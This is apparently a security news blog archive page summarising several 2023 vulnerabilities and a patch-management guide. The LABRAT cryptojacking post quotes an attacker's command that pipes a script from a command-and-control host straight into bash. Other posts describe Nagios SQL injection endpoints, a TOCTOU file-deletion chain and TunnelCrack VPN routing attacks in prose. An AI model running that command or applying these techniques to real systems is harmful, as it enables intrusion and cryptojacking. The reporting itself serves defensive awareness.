Nagios XI is a prominent and frequently used commercial monitoring system for IT infrastructure and network monitoring. 

Vulnerability Research Engineer Astrid Tedenbrant found four distinct vulnerabilities in Nagios XI (version 5.11.1 and below) while conducting routine research.

By making use of three of these flaws classified as (CVE-2023-40931CVE-2023-40933, and CVE-2023-40934), users with various levels of access rights can get access to the database field via SQL injection.

Additionally, the vulnerability (CVE-2023-40932) permits Cross-Site Scripting through the Custom Logo component, rendering on all pages, including the login page.

Details of the Vulnerabilities

SQL Injection in Banner acknowledging endpoint (CVE-2023-40931)

“Announcement Banners” are a feature of Nagios XI that users may choose to recognize. This feature’s endpoint is susceptible to a SQL Injection attack.

When a user acknowledges a banner, a POST request is made to ‘/nagiosxi/admin/banner_message-ajaxhelper.php’ with the POST data ‘action=acknowledge banner message&id=3’.

“The ID parameter is assumed to be trusted but comes directly from the client without sanitization”, the researcher explains.

“This leads to a SQL Injection where an authenticated user with low or no privileges can retrieve sensitive data, such as from the `xi_session` and `xi_users` table containing data such as emails, usernames, hashed passwords, API tokens, and backend tickets”.

SQL Injection in Host/Service Escalation in CCM (CVE-2023-40934)

An authorized user with access to control host escalations can run any database query using Nagios XI’s Core Configuration Manager.

The same database access is possible through this vulnerability as through previous SQL Injection vulnerabilities, although it necessitates more privileges than CVE-2023-40931.

SQL Injection in Announcement Banner Settings (CVE-2023-40933)

In this case, while performing the `update_banner_message_settings` action on the affected endpoint, the `id` parameter is assumed to be trusted and is concatenated into a database query with no sanitization. This allows an attacker to modify the query, the researcher said.

Compared to CVE-2023-40931, successful exploitation of this vulnerability needs more privileges but provides the same database access as the other two SQL Injection Vulnerabilities.

Cross-Site Scripting in Custom Logo Component (CVE-2023-40932)

Reports say Nagios XI may be modified to include a unique corporate logo, which will be visible across the entire product. Included in this are the login page, various administration pages, and the landing page.

A cross-site scripting flaw in this functionality allows an attacker to inject arbitrary JavaScript, which any user’s browser will be able to execute.

“This can be used to read and modify page data, as well as perform actions on behalf of the affected user. Plain-text credentials can be stolen from users’ browsers as they enter them.,” reports said.

Fix Available

All of these vulnerabilities have been fixed, and users are encouraged to update to 5.11.2 or later.

The commercial version of the open-source Nagios Core monitoring platform, Nagios XI, offers more functionality that makes managing complicated IT settings easier.

Because of the access that Nagios XI requires, it is frequently used in highly privileged instances, making it an attractive target for attackers.

SQL Injection Strategies: Practical techniques to secure old vulnerabilities against modern attacks


InfoSec tools
 | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: SQL injection


Sep 13 2023

Windows Arbitrary File Deletion Vulnerability Leads to Full System Compromise

Category: Security vulnerabilities,Windows Securitydisc7 @ 8:02 am

Threat actors were using Windows Arbitrary File Deletion to perform Denial-of-service attacks on systems affected by this vulnerability. However, recent reports indicate that this Windows Arbitrary file deletion can be used for a full compromise.

The possibility of this attack depends on the CVE-2023-27470 arbitrary file deletion vulnerability combining it with a Time-of-Check to Time-of-Use (TOCTOU) race condition, which enables the deletion of files on a Windows system and subsequently creates an elevated Command Prompt.

CVE-2023-27470 & TOCTOU – Technical Analysis

CVE-2023-27470 affects N-Able’s Take Control Agent, which can lead to an arbitrary file deletion vulnerability. This vulnerability analysis was done using Microsoft’s Process Monitor, often called ProcMon. 

This vulnerability exists due to insecure file operations conducted by NT AUTHORITY\SYSTEM processes that were detected with the help of ProcMon filters.

The process that was analyzed during this vulnerability was BASupSrvcUpdater.exe, belonging to Take Control Agent 7.0.41.1141.

Race Condition

BASupSrvcUpdater.exe attempts every 30 seconds to a non-existent folder under the C:\ProgramData\GetSupportService_N-Central\PushUpdates as an NT AUTHORITY\SYSTEM process. For further research, this PushUpdates folder and a dummy file aaa.txt were created.

BASupSrvcUpdater.exe made an attempt to read the contents of the folder and performed a deletion, which was logged in the C:\ProgramData\GetSupportService_N-Central\Logs\BASupSrvcUpdater_[DATE].log log file. 

This particular action gives rise to a race condition, as a threat actor can exploit this condition by utilizing the timeframe between the deletion and logging.

To exploit this condition and perform a full system compromise, an attacker must replace a file in the PushUpdates folder with a pseudo-symlink.

complete report about this attack has been published, which provides detailed information about the exploitation, techniques, process, and method of complete system compromise.

To prevent this attack, it is recommended for organizations using N-able to upgrade to version 7.0.43 to fix this vulnerability.

Mastering Windows Security and Hardening: Secure and protect your Windows environment from cyber threats using zero-trust security principles

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Full System Compromise, Mastering Windows Security and Hardening


Sep 11 2023

Notepad++ v8.5.7 Released: Fix for 4 Security Vulnerabilities

Category: Security vulnerabilitiesdisc7 @ 8:19 am

Notepad++ v8.5.7 has been released, which has several bug fixes and new features. There has also been Integrity and authenticity validation, added Security enhancement and fixed a memory leak while reading Utf8-16 files.

Multiple vulnerabilities in Notepad++ relating to Heap buffer read overflow, Heap buffer write overflow & Global buffer read overflow were previously reported. However, the new version of Notepad++ claims to have patched these vulnerabilities.

Gitlab security researcher Jaroslav Lobačevski (@JarLob) discovered these vulnerabilities during the end of August 2023. However, as part of the GitLab coordinated disclosure policy, these vulnerabilities were publicly disclosed before Notepad++ patched them.

Notepad++ v8.5.7

This current new version of Notepad++ implemented the integrity and authenticity validation by introducing the GPG Notepad++ Public key which can be used for the verification of GPG Signature. In addition to that, SHA-256 digests of binary packages have also been added which can be used for checking the integrity of your Notepad++ download.

As part of Bug fixes and new features, Notepad++ has fixed the vulnerabilities reported previously which had the CVE IDs CVE-2023-40031CVE-2023-40036CVE-2023-40164 & CVE-2023-40166

Other fixes include Document disassociated issue, Dragging tab performance issue, Session file saving problem, product version value displayed in file’s properties and activating wrong file(s) were also rectified as part of this new release.

Furthermore, Notepad++ has added an option to suppress file with more than 2GB. This option enables Notepad++ to wait for user confirmation before opening a large file.

“Notepad++ will completely hang and await user confirmation when trying to open a file bigger than 2GB.” reads the issue on GitHub. Notepad++ has also released their current version of source code which can be found in this link

It is recommended for users of Notepad++ to upgrade to version 8.5.7 in order to fix the vulnerabilities and improve the application’s performance.

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Notepad++


Sep 10 2023

Security Controls and Vulnerability Management

IS27002 Control:-Vulnerability Management
Why penetration test is important for an organization.
Ensuring the protection of user data in real-time, effectively prioritizing risk, fostering security awareness, devising strategies to identify vulnerabilities, and implementing an incident response protocol aligned with vulnerability management. Following compliance protocols becomes crucial in order to abide by and fulfil regulatory standards.
#informationsecurity #cyberdefense #cybersecurity
Cheat sheet for pentester
Image credit:-https://lnkd.in/eb2HRA3n

Linux Cheat Sheet

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: vulnerability management


Aug 21 2023

LABRAT Campaign Strikes: GitLab Flaw Exploited For Cryptojacking and Proxyjacking

Category: Security vulnerabilitiesdisc7 @ 10:29 am
GitLab Flaw Strikes

A new campaign called LABRAT is targeting GitLab with cryptojacking and proxyjacking.

LABRAT, a financially motivated operation, has been uncovered by the Sysdig Threat Research Team (TRT). Notably, the attackers have prioritized stealth and defense evasion tactics.

The LABRAT attackers used an open-source rootkit called hiding-cryptominers-linux-rootkit to conceal their crypto-mining activity by hiding files, processes, and CPU usage.

Technical Analysis – GitLab exploitation

The attacker gained initial access to a container by exploiting the known GitLab vulnerability, CVE-2021-22205. In this vulnerability, GitLab does not properly validate image files passed to a file parser, resulting in a remote command execution. There are many public exploits for this vulnerability, which is still actively exploited.

  • Once the attacker had access to the server, they executed the following command to download a malicious script from the C2 server.
    curl -kL -u lucifer:369369 https://passage-television-gardening-venue[.]trycloudflare.com/v3 | bash
  • The initial script allowed the attacker to achieve persistence, evade defenses, and perform lateral movement through the following actions:
  • Check whether or not the watchdog process was already running to kill it.
  • Delete malicious files if they exist from a previous run.
  • Disable Tencent Cloud and Alibaba’s defensive measures, a recurring feature of many attackers.
  • Download malicious binaries.
  • Create a new service with one of these binaries and if root, ran it on the fly.
  • Modify various cron files to maintain persistence.
  • Gather SSH keys to connect to those machines and start the process again, doing lateral movement.
  • Deletes any evidence that the above processes may have generated.

For more details on LABRAT campaign:

https://hackersonlineclub.com/gitlab-exploited-labrat-cryptojacking-and-proxyjacking/

InfoSec tools | InfoSec services | InfoSec books | Follow our blog

Tags: Cryptojacking, LABRAT Campaign, Proxyjacking


Aug 11 2023

TUNNELCRACK: TWO SERIOUS VULNERABILITIES IN VPNS DISCOVERED, HAD BEEN DORMANT SINCE 1996

Category: Security vulnerabilities,VPNdisc7 @ 9:01 am

The term “virtual private network,” or VPN for short, has become almost synonymous with “online privacy and security.” VPNs function by creating an encrypted tunnel through which your data may transit as it moves over the internet. They are designed to protect your privacy and make it impossible for anyone to monitor or access your activity while you are online. But what happens if the same instrument that was supposed to keep your privacy safe turns out to be a conduit for attacks? Introduce yourself to “TunnelCrack,” a frightening discovery that has sent shockwaves across the world of cybersecurity. Nian Xue from New York University, Yashaswi Malla and Zihang Xia from New York University Abu Dhabi, Christina Popper from New York University, and Mathy Vanhoef from KU Leuven University were the ones that carried out the study.

Two serious vulnerabilities in virtual private networks (VPNs) have been discovered by a research team . These vulnerabilities had been dormant since 1996. It is possible to leak and read user traffic, steal information, or even conduct attacks on user devices by exploiting these vulnerabilities, which are present in practically every VPN product across all platforms. TunnelCrack is a combination of two common security flaws found in virtual private networks (VPNs). Even though a virtual private network (VPN) is designed to safeguard all of the data that a user sends, these attacks are able to circumvent this security. An enemy, for example, may take advantage of the security flaws to steal information from users, read their communications, attack their devices, or even just spill it all. Regardless of the security protocol that is utilized by the VPN, the uncovered flaws may be exploited and used maliciously. In other words, even Virtual Private Networks (VPNs) that claim to utilize “military grade encryption” or that use encryption methods that they themselves invented are vulnerable to attack. When a user joins to an unsecured Wi-Fi network, the initial set of vulnerabilities, which they  refer to as LocalNet attacks, is susceptible to being exploited. The second group of vulnerabilities, which are known as ServerIP attacks, are susceptible to being exploited by shady Internet service providers as well as by unsecured wireless networks. Both of these attacks involve manipulating the routing table of the victim in order to deceive the victim into sending traffic outside the secured VPN tunnel. This enables an adversary to read and intercept the data that is being sent.

The video that may be seen below demonstrates three different ways in which an attacker might take advantage of the disclosed vulnerabilities. In the first step of the attack, the LocalNet vulnerability is exploited to force the target to leak communications. This is used to intercept sensitive information that is being transferred to websites that do not have enough security, such as the victim’s account and password being exposed. They also demonstrate how an adversary may determine which websites a user is accessing, which is something that is not generally achievable when utilizing a virtual private network (VPN). Last but not least, a modification of the LocalNet attack is used in order to prevent a surveillance camera from alerting its user to any unexpected motion.

As the demonstration indicates, the vulnerabilities in the VPN may be exploited to trivially leak traffic and identify the websites that an individual is accessing. In addition, any data that is transferred to websites with inappropriate configurations or that is supplied by applications that are not secure may be intercepted.

Users may protect themselves by keeping the software for their VPNs up to date. Additionally, any data that is transferred cannot be stolen if a website is correctly set using HTTP Strict Transport protection (HSTS) to always utilize HTTPS as an additional layer of protection. These days, around 25 percent of websites are built in this manner. In addition, a few of browsers will now display a warning to the user if HTTPS is not being utilized. Last but not least, while they are not always error-free, most current mobile applications employ HTTPS by default and, as a result, also use this additional security.

In addition to being exploited to attack websites, virtual private networks (VPNs) sometimes defend outdated or less secure protocols, which presents an additional danger. These attacks now make it possible for an adversary to circumvent the security provided by a virtual private network (VPN), which means that attackers may target any older or less secure protocols that are used by the victim, such as RDP, POP, FTP, telnet, and so on.


LocalNet Attacks

The adversary in a LocalNet attack pretends to be a hostile Wi-Fi or Ethernet network, and they deceive the victim into joining to their network by using social engineering techniques. Cloning a well-known Wi-Fi hotspot, such as the one offered by “Starbucks,” is a straightforward method for achieving this goal. As soon as a victim establishes a connection to this malicious network, the attacker allots the victim a public IP address as well as a subnet. An illustration of this may be seen in the graphic below; the objective of the opponent in this case is to prevent traffic from reaching the website target.com:
The website target.com, which can be seen in the picture to the right, uses the IP address 1.2.3.4. The adversary will convince the victim that the local network is utilizing the subnet 1.2.3.0/24 in order to intercept traffic that is headed toward this website. The victim is told, in other words, that IP addresses in the range 1.2.3.1-254 are immediately accessible inside the local network. A web request will be sent to the IP address 1.2.3.4 if the victim navigates to target.com at this time. The victim will submit the web request outside the secured VPN tunnel because it believes that this IP address is immediately available inside the local network.

An adversary may potentially leak practically all of the victim’s traffic by assigning bigger subnets to the local network they have access to. In addition, although while the LocalNet attack’s primary objective is to send data outside the VPN tunnel, it may also be exploited in such a way as to prevent some traffic from passing through while the VPN is in operation.

ServerIP Attacks

In order to execute a ServerIP attack, the attacker has to have the ability to spoof DNS responses before the VPN is activated, and they also need to be able to monitor traffic going to the VPN server. Acting as a hostile Wi-Fi or Ethernet network is one way to achieve this goal; in a manner similar to the LocalNet attacks, this may also be done. The attacks may also be carried out via an Internet service provider (ISP) that is hostile or by a core Internet router that has been hacked.

The fundamental premise is that the attacker will attempt to impersonate the VPN server by forging its IP address. An attacker may fake the DNS answer to have a different IP address if, for instance, the VPN server is recognized by the hostname vpn.com but its actual IP address is 2.2.2.2. An illustration of this may be seen in the following image, in which the adversary’s objective is to intercept communication sent towards target.com, which has the IP address 1.2.3.4:

The attacker begins by forging the DNS reply for vpn.com such that it returns the IP address 1.2.3.4. This IP address is identical to the IP address of target.com. To put it another way, if you wish to leak traffic towards a certain IP address, you fake that address. After that, the victim will connect to the VPN server that is located at 1.2.3.4. This traffic is then redirected to the victim’s actual VPN server by the adversary, who does this to ensure that the victim is still able to successfully build a VPN connection. As a consequence of this, the victim is still able to successfully build the VPN tunnel even if they are using the incorrect IP address while connecting to the VPN server. In addition to this, the victim will implement a routing rule that will direct all traffic destined for 1.2.3.4 to be routed outside of the VPN tunnel.

A web request is now made to 1.2.3.4 whenever the victim navigates to target.com on their web browser. This request is routed outside of the secured VPN tunnel because of the routing rule that prevents packets from being re-encrypted when they are submitted to the VPN server. As a direct consequence of this, the web request is exposed.

The built-in VPN clients of Windows, macOS, and iOS were discovered to have security flaws by this study. Android versions 12 and above are not impacted by this issue. A significant portion of Linux-based virtual private networks (VPNs) are also susceptible. In addition, they discovered that the majority of OpenVPN profiles, when used with a VPN client that is susceptible to vulnerabilities, utilize a hostname to identify the VPN server, which may lead to behavior that is susceptible to vulnerabilities.

In order to keep customers safe, they worked together with CERT/CC and a number of other VPN providers to develop and release security upgrades over the course of a coordinated disclosure period of ninety days. Mozilla VPN, Surfshark, Malwarebytes, Windscribe (which can import OpenVPN profiles), and Cloudflare’s WARP are a few examples of VPNs that have been updated with patches. You can protect yourself against the LocalNet attack even if updates for your VPN are not currently available by turning off connection to your local network. You may further reduce the risk of attacks by ensuring that websites utilize HTTPS, a protocol that is supported by the majority of websites today.

Securing IPsec Virtual Private Networks

CISSP training course

InfoSec tools | InfoSec services | InfoSec books

Tags: TUNNELCRACK


Aug 10 2023

CODE EXPLOITING TWO CRITICAL PHP(< 8.0.30) VULNERABILITIES PUBLISHED

Category: App Security,Security vulnerabilitiesdisc7 @ 8:25 am

PHP is a widely used programming language that is put to use in the production of dynamic web pages. On the other hand, much like any other program, it is not completely safe from security flaws. CVE-2023-3823 and CVE-2023-3824 are the names of two new security flaws that have been identified in PHP during the course of the last several months.


CVE-2023-3823 (SCORE OF 8.6 ON THE CVSS SCALE): INFORMATION DISCLOSURE


An information disclosure vulnerability known as CVE-2023-3823 exists in PHP applications and makes it possible for a remote attacker to access sensitive data stored inside such applications. Inadequate validation of the XML input given by the user is the root cause of the vulnerability. This vulnerability might be exploited by the attacker by having them transmit a specially designed piece of XML code to the program. The program would then proceed to parse the code, at which point the attacker would be able to obtain access to sensitive information such as the contents of arbitrary files on the system or the results of queries made to external sources.

This issue may affect any program, library, or service that interacts with XML documents in any way, including processing or communicating with them. Because to the hard work done by nickvergessen, a security researcher, who also released the proof-of-concept.

CVE-2023-3824 IS A BUFFER OVERFLOW VULNERABILITY THAT HAS A CVSS SCORE OF 9.4.

A remote attacker might execute arbitrary code on a PHP system if they exploited the buffer overflow vulnerability known as CVE-2023-3824. This issue is tracked by the CVE identifier. The insufficient bounds checking performed by the phar_dir_read() method is the root cause of the vulnerability. By submitting a request to the application that has been carefully designed, an adversary might take advantage of this vulnerability. The request would then result in a buffer overflow, which would give the adversary the ability to take control of the system and run whatever code they pleased.

The difficulty of exploiting this vulnerability stems from the fact that it involves a number of faulty checks and overflows. For instance, it was discovered that the condition “to_read == 0 || count ZSTR_LEN(str_key)” was flawed and should not have been used. This has a number of repercussions in the code, one of which is that there is a problem with the line ((php_stream_dirent *) buf)->d_name[to_read + 1] = ‘0’;. This piece of code has the potential to overflow, and it does not NUL-terminate the filename in the correct manner. The issue has been compared to a stack information leak as well as a buffer write overflow, which only serves to exacerbate the situation.In addition to that, there may be potential worries over a buffer overflow in the memset. Even though there have been no such occurrences detected inside PHP itself, third-party extensions might still be impacted.

Although the exploitation is certainly difficult and is contingent on the particular application that is being targeted, it is nevertheless theoretically possible. According to the alert issued by the security team, “People who inspect the contents of untrusted phar files could be affected.”

The proof-of-concept was also released thanks to the efforts of security researcher nielsdos, who is credited for his work.

In PHP 8.0.30, the vulnerabilities CVE-2023-3823 and CVE-2023-3824 have also been addressed. If you are still using an earlier version of PHP, you should consider upgrading as soon as you can to the 8.0.30 release.

PHP Security and Session Management: Managing Sessions and Ensuring PHP Security 

CISSP training course

InfoSec tools | InfoSec services | InfoSec books

Tags: PHP, PHP Security


Aug 09 2023

16 Zero-Day Vulnerabilities Discovered in CODESYS Affect Millions of Industrial Devices

Category: OT/ICS,Security vulnerabilities,Zero daydisc7 @ 10:20 am

CODESYS, a widely-used integrated environment for controller programming, holds a strong presence in Operational Technology across diverse industries, such as:-

  • Factory automation
  • Energy
  • Mobile
  • Building
  • Embedded
  • Process

Backed by more than 500 manufacturers (including Schnieder Electric, Beckhoff, Wago, Eaton, ABB, Festo, etc.) and spanning various architectures that we have mentioned below, CODESYS powers millions of global devices:-

  • MIPS
  • Renesas
  • ARM
  • PowerPC
  • TriCore

Cybersecurity Researcher at Microsoft, Vladimir Eliezer Tokarev, recently identified several high-severity vulnerabilities and 16 zero-day vulnerabilities in CODESYS (CODESYS V3 SDK).

Microsoft’s cyberphysical system researchers identified high-severity vulnerabilities in CODESYS V3 SDK that could lead to security risks for OT infrastructure. If you’re at #BHUSA, you can attend this session on August 10 to learn more: https://msft.it/60199ynQT

Besides this, Vladimir Eliezer Tokarev dubbed the 16 zero-day vulnerabilities that he found in CODESYS as “CoDe16,” a code name for this complete set of CODESYS zero-day vulnerabilities.

While the OT infrastructure could be affected severely by successfully exploiting all these high-severity vulnerabilities discovered in CODESYS V3 SDK.

Moreover, the Microsoft Threat Intelligence team also prompted and recommended that users at the BHUSA event (Black Hat USA 2023) attend their official session related to this vulnerability profile on August 10.

BHUSA Event Session

Cybersecurity researchers will detail the following key things during this event session:-

  • Exciting findings
  • Share technical insights into vulnerability discovery
  • Firmware extraction
  • Analysis

Apart from this, all the challenges, like proprietary network protocols and debugger-free analysis, will also be explored.

Security analysts will also unveil the root-cause for key flaws, and demonstrate the remote code execution chain to implant malicious payload, gaining full PLC control and factory floor manipulation.

Closing remarks will include the mitigation strategies, an open-source validation tool for CODESYS devices, and a live demo of successful RCE on an exposed system.

Pentesting Industrial Control Systems: An ethical hacker’s guide to analyzing, compromising, mitigating, and securing industrial processes

CISSP training course

InfoSec tools | InfoSec services | InfoSec books

Tags: Industrial Devices, OT/ICS critical infrastructure


Aug 01 2023

A step-by-step guide for patching software vulnerabilities

Category: Security patching,Security vulnerabilitiesdisc7 @ 8:59 am

The Cyber Threat Index 2023 by the Coalition anticipates a 13% increase in the average rate of Common Vulnerabilities and Exposures (CVEs) compared to 2022, projecting it to surpass 1,900 per month in 2023. This surge in CVEs poses a challenge for organizations as they grapple with managing the release of thousands of patches and updates every month.

Streamline your patch management process

First a quick disclaimer. Proper patch management relies on important factors like size of an organization, complexity of an IT environment, criticality of systems, and number of resources allocated to manage it all, so plan accordingly. Also, this advice assumes you already have some sort of endpoint management solution or function in place for deploying patches. If not, that’s step one.

Assuming you have a solution in place, the next step is to evaluate and prioritize patches.

Not all vulnerabilities are created equally, which means not all patches are either. But as vulnerabilities like WannaCry demonstrated, delayed patching can have catastrophic consequences. Therefore, it’s important to prioritize updates that have the highest severity of non-superseded vulnerabilities and/or the highest exposure for each environment. For example, if you have an update that impacts only a few devices out of a thousand, and another that impacts 80% of devices, but both are critical, focus on the one that could have the biggest negative impact, and then address the others.

Once the critical updates are addressed, plan to move onto the non-critical patches, which are often driver updates or new software that enhances user experience and prioritize those based on importance to business operations.

Many use the Common Vulnerability Scoring System (CVSS) to help prioritize updates, which is a good starting point. Just remember that many vulnerabilities rated at a medium severity level are ignored – and found to be the source of a breach later.

Once you’ve prioritized the types of updates, the next step is to create guidelines for testing them before they go into production.

The last thing you want to do is break the system. Start by researching the criteria of each update and identifying which components require testing. Next, install each update on at least five off-network devices to be tested against proven success criteria. Record the evidence and have another person review it. Be sure to find out if the update has an uninstaller and use it to ensure complete and safe removal of outdated programs.

If you’re like most organizations, you’ll likely plan on having tons of updates/patches happening all the time. But the more updates installed at any given time increases the risk of end-user disruption (i.e., greater volume of data needing to be downloaded, longer installation times, system reboots, etc.).

Therefore, the next step is to assess your system’s bandwidth, calculate the total number and size of the updates against the total number of devices and types. This can prevent system overloads. When in doubt, just plan to start with five updates and then reassess bandwidth.

Additionally, if you follow any change management best practices (such as ITIL, Prince2, or ServiceNow), it’s important you adhere to those processes for proper reporting and auditability. They usually require documentation on which updates are needed, the impact on a user, evidence of testing, and go-live schedules. Capturing this data properly through the above steps is often required for official approvals as it serves as a single source of truth.

We’ve now gotten to the point of deployment. The next step is to ensure deployment happens safely. I recommend using a patch management calendar when making change requests and when scheduling or reviewing new patch updates. This is where you define the baselines for the number of updates to be deployed and in which order. This should utilize information gathered from previous steps. Once that baseline is set, you can schedule the deployment and automate where necessary.

At last, we’ve made it to the final step: measuring success. This can be handled in a variety of ways. For example, by the number of registered help desk incidents, the ease of which the process can be followed or repeated, or the number of positive reports provided by your toolsets. But ultimately what matters is swift deployment, streamlined repeatable processes, a reduction in manual requirements, and in the end, an organization that is less vulnerable to exploit.

A quick note on where patching often goes awry

Believe it or not, some organizations still allow users to have local admin rights for patching. This creates major attack surfaces, and the reality is, no IT team should rely on end-users for patching (blanket admin rights are just too risky).

Some also rely on free tools, but these often do not deliver all the security needed for patching. They also generally don’t provide the necessary reporting to ensure systems are 100% patched (i.e., validation). And finally, there is an over-reliance on auto-updates. Auto-updates can provide a false sense of security and can impact productivity if they are triggered during work hours.

Conclusion

Whether large or small, organizations continue to struggle with patching. I hope this quick step-by-step guide of key considerations for patch management helps your organization create a new framework or optimize an existing one.

Vulnerability And Patch Management A Complete Guide

CISSP training course

InfoSec tools | InfoSec services | InfoSec books

Tags: Vulnerability Management Program


Next Page »